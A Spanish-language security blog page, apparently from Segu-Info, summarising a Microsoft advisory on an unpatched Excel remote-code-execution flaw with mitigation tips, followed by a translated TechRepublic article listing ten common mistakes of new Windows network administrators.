Sergio de los Santos
[email protected]

Fuente: Hispasec I y II

Seguir leyendo...

Vulnerabilidad en Excel sin parchear

En el día de hoy Microsoft a liberado un boletín de seguridad (968272) respecto a una vulnerabilidad en varias versiones de Microsoft Excel que podría permitir a un atacante la ejecución de código remoto. Hasta el momento, Microsoft manifiesta estar al tanto solo de un número limitado de ataques aislados. Según el boletín, la empresa está trabajando para remediar la vulnerabilidad a través de un parche (en las actualizaciones del próximo mes o, de ser necesario, en una actualización fuera de ciclo).

Las versiones afectadas son las siguientes: Microsoft Office 2000, Microsoft Office 2002, Microsoft Office 2003, Microsoft Office 2007, Microsoft Office 2004 for Mac, and Microsoft Office 2008 for Mac.

Para mitigar los riesgos, hasta la aparición del parche, se recomienda a los usuarios tener en cuenta los siguientes consejos:

• No abrir archivos de Excel que provengan de fuentes no confiables o que fueron recibidos sin solicitar. La vulnerabilidad no puede explotarse por correo electrónico. Solo es posible si el usuario ejecuta el archivo de Office.
• Utilizar cuentas de usuario con permisos limitados. Un atacante que logre explotar exitósamente la vulnerabilidad, podrá contar con los mismos permisos que el usuario que ejecute el archivo. Por lo tanto, utilizar usuarios sin permisos administrativos disminuye el riesgo.
• Las herramientas de Microsoft Office Document Open Confirmation Tool (para Office 2000), Microsoft Office Isolated Conversion Environment (MOICE) y Microsoft Office File Block policy colaboran a mitigar el riesgo.
  

Hasta la aparición del parche, recomendamos a los usuarios prestar atención a los consejos aquí descritos y estar atentos para actualizar rápidamente, ya que los ataques podrían aumentar luego de la publicación del boletín de Microsoft.

Sebastián - Redaccion de Segu-Info

Seguir leyendo...

Diez equivocaciones que cometen los nuevos administradores Windows

Puede que usted sea un nuevo administrador de red. Tomó algunos cursos, pasó algunos exámenes de certificación, quizás incluso tenga armado un dominio Windows en su casa. Pero pronto encontrará que ser responsable de la red de una compañía trae desafíos que no había anticipado. O quizás ya es una persona experimentada en TI en compañías, pero hasta ahora había trabajado en ambientes UNIX. Ahora, ya sea por un cambio de trabajo o un nuevo desarrollo en su lugar actual de trabajo, se encuentra en el menos familiar mundo de Windows.

Este artículo apunta a ayudarlo a evitar algunos de las equivocaciones más comunes que cometen los nuevos administradores Windows.

1. Tratar de cambiar todo a la vez

Cuando llega a un trabajo nuevo, o comienza a trabajar con una nueva tecnología, puede que tenga todo tipo de ideas brillantes. Si es nuevo en el lugar de trabajo, mejorará inmediatamente aquellas cosas que su predecesor (ó parece que, ó estaba) haciendo mal. Está lleno de todas las mejores prácticas y trucos que aprendió en la escuela. Si es un administrador que viene de una ambiente diferente, puede que esté acostumbrado a sus propias formas y quiera hacer las cosas de la forma que las hacía antes, en vez de aprovechar la características del nuevo SO.

De cualquier forma, es probable que se cause a usted mismo una gran pena. La mejor opción para alguien nuevo en redes Windows (o para cualquier otro trabajo) es darse un tiempo para adaptarse, observar y aprender, y proceder de forma pausada. Así hará más sencillo su trabajo y de esta forma a largo plazo hará más amigos (o al menos, menos enemigos).

2. Sobrestimar la capacidad técnica de los usuarios finales

Muchos administradores nuevos esperan que los usuarios tengan una mejor comprensión de la tecnología de la que tienen. No asuma que los usuarios finales comprendan la importancia de la seguridad, o que serán capaces de describir con precisión los errores que tienen, o que saben lo que se quiere decir cuando les dice que realicen una tarea sencilla (para usted) tal como ir al Administrador de Dispositivos y verificar el estado de la placa de sonido.

Mucha gente en el mundo de los negocios usa computadoras todos los días, pero saben muy poco sobre ellas más allá de operar ciertas aplicaciones específicas. Si se frustra con ellos, o los hace sentir estúpidos, la mayoría tratará de evitar llamarlo cuando haya un problema. En lugar de eso lo ignorarán (si pueden) o peor, tratarán de arreglarlo por sí mismos. Eso significa que los problemas podrán ser mucho peores para cuando se de cuenta de ellos.

3. Subestimar la experiencia técnica de los usuarios finales.

Aunque lo de arriba aplica para muchos de sus usuarios, la mayoría de las compañías tienen al menos algunos que son aficionados avanzados de computación y saben mucho de tecnología. Esos son los que surgirán con maneras innovadoras de sortear las restricciones que ponga si es que estas restricciones les resultan un inconveniente. La mayoría de estos usuarios no son maliciosos; solo están molestos que alguien más controle el uso de sus computadoras, especialmente si los trata como si no supieran nada.

La mejor táctica con estos usuarios es mostrarle que respeta sus habilidades, buscar su colaboración, y hacerles saber los motivos de las reglas y restricciones. Señalar que incluso el mejor corredor de autos que ha demostrado su habilidad por conducir de forma segura a alta velocidad debe soportar los límites de velocidad en las vía publica, y que no es porque se dude de sus habilidades tecnológicas, que usted debe insistir en señalarle a todos que sigan las reglas.

4. No habilitar la auditoría

Los sistemas operativos Windows Server tienen una auditoría de seguridad propia, pero no está habilitada por defecto. Tampoco es una de las características mejor documentadas, así que algunos administradores no logran aprovecharla. Y es una lástima, porque con las características de auditoría, usted puede llevar registro de los intentos de ingreso (logon), acceso a archivos y otros objetos, y acceso a los servicios de directorio. La auditoría de los Servicios de Dominio de Directorio Activo (AD DS) han sido mejorados en Windows Server 2008 y se pueden hacer ahora de forma más granular. Sin la auditoría propia o de software de terceros, puede ser casi imposible ubicar con exactitud y analizar que pasó en una brecha de seguridad.

5. No mantener actualizados los sistemas

Esto no requiere pensarse siquiera. Mantener sus servidores y máquinas cliente emparchados con las últimas actualizaciones de seguridad puede ser el camino para prevenir caídas, pérdidas de datos, y otras consecuencias del malware y los ataques. A pesar de ello muchos administradores se retrasan y sus redes están funcionando con sistemas que no están emparchados apropiadamente.

Esto sucede por varias razones. Departamentos de TI recargados y con poco personal sencillamente no consiguen aplicar los parches tan pronto son publicados. Después de todo, no es siempre una cuestión de “solo hacerlo”, todos saben que algunas actualizaciones pueden romper cosas, provocando que toda su red se detenga. Por lo tanto es prudente verificar los nuevos parches en un ambiente de prueba que simule las aplicaciones y configuraciones de su ambiente de red productivo.

Sin embargo, eso lleva tiempo, tiempo que puede que no tenga. Automatizar el proceso tanto como sea posible puede ayudarlo a mantener fluyendo esas actualizaciones. Tenga su red de prueba lista cada mes antes que, por ejemplo, Microsoft publique sus parches regulares. Use los Servicios de Actualización de Windows Server (WSUS) u otra herramienta para simplificar y automatizar el proceso una vez que decidió que el parche es seguro para ser aplicado. Y no olvide que las aplicaciones, no sólo el sistema operativo, también necesitan ser actualizadas.

6. Volverse descuidado con la seguridad

Muchos administradores fuerzan las mejores prácticas de seguridad para sus usuarios pero se vuelven descuidados con sus propias máquinas. Por ejemplo, profesionales de TI que nunca permiten a los usuarios correr XP usando una cuenta de administrador, no lo tienen en cuenta para ellos mismos mientras realizan tareas rutinarias que no requieren ese nivel de privilegios. Algunos administradores parecen pensar que ellos son inmunes al malware y los ataques porque ellos “saben más”. Pero este exceso de confianza puede llevar al desastre, tal como sucede en el caso de oficiales de policía que tienen la tasa más alta de accidentes con armas de fuego porque estando todo el tiempo alrededor de las armas se vuelven displicentes respecto de los peligros.

7. No documentar los cambios ni los arreglos
   
   Documentar es una de las cosas más importantes que usted, como administrador de red, puede hacer para que su propio trabajo sea más sencillo y para facilitárselo a alguien más que ingrese y se haga cargo de la red en su ausencia. Sin embargo esta es una de las tareas más descuidadas de todas las tareas administrativas.
   
   Puede pensar que recordará que parche aplicó o que cambio de configuración hizo que solucionó un problema exasperante, pero un año después, probablemente no lo recordará. Si documenta sus acciones, no deberá perder tiempo precioso reinventando la rueda (o el arreglo) de nuevo.
   
   Algunos administradores no quieren documentar lo que hacen porque piensan que si lo tienen todo en su cabeza, serán indispensables. En verdad, nadie nunca es irreemplazable y por hacer más difícil que algún otro aprenda su trabajo, hace menos probable que alguna vez sea promovido de ese trabajo.
   
   Además, ¿que pasa si es atropellado por un camión mientras cruza la calle? ¿Realmente quiere que la compañía se paralice porque nadie sabe las contraseñas administrativas o tenga idea como ha configurado las cosas y que tareas diarias tiene que realizar para mantener la red en buen funcionamiento?

8. No probar los respaldos

   Una de las cosas de las cuales se arrepienten más los usuarios hogareños es de olvidar respaldar su información importante y debido a eso lo pierden todo cuando les falla un disco rígido. La mayoría de los profesionales de TI comprenden la importancia de hacer respaldos y lo hacen de forma regular. Lo que algunos administradores muy ocupados no recuerdan hacer es probar regularmente esos respaldos para asegurarse que la información realmente está allí y que puede ser recuperada.
   
   Recuerde que hacer el respaldo es solo el primer paso. Necesita asegurarse que esos respaldos funcionaran cuando los pueda necesitar.

9. Prometer lo que no se puede dar y no cumplir con las expectativas

   Cuando su jefe lo presiona por respuestas a preguntas tales como “¿Cuando podrás tener todos los sistemas de escritorio actualizados con la nueva versión del software?” o “¿Cuánto costará tener el nuevo servidor de base de datos instalado y funcionando?”, su tendencia natural puede ser de dar una respuesta que lo haga quedar bien. Pero si hace promesas que no puede cumplir y luego se atrasa o se pasa del presupuesto, se hace a si mismo más un daño que un bien.
   
   Una buena regla general en cualquier negocio es prometer menos y entregar más en vez de hacer lo opuesto. Si piensa que tomará dos semanas implementar un nuevo sistema, dese un poco de margen y prométalo para dentro de tres semanas. Si está seguro que podrá comprar el nuevo hardware que necesita por $10.000, por las dudas pida $12.000.
   Su jefe quedará impresionado cuando termine el proyecto algunos días antes de tiempo o cuando gaste menos dinero que el esperado.
   

10. Tener miedo de pedir ayuda

    El ego es algo divertido, y muchos administradores de TI han invertido mucho en el suyo. Cuando se trata de tecnología, puede que sea reticente en admitir que no lo sabe todo, y por lo tanto tema, o sienta vergüenza, de pedir ayuda. He conocido MCSEs y MVPs que no pueden soportar pedir ayuda a sus colegas porque sienten que se supone que son los “expertos” y que su reputación podría dañarse si admiten lo contrario. Pero lanzarse a un proyecto cuando no sabe lo que está haciendo puede sumergirlo en agua caliente, costarle mucho dinero a la compañía, e incluso costarle a usted su trabajo.
    

    Si algo lo sobrepasa, esté dispuesto a admitirlo y busque ayuda de alguien con más conocimiento sobre el tema. Puede ahorrarse días, semanas e inclusos meses de fracasos.

Traducido para blog de Segu-Info por Raúl Batista

Autor: Debra Littlejohn Shinder, MCSE, MVP.
Fuente: TechRepublic

Seguir leyendo...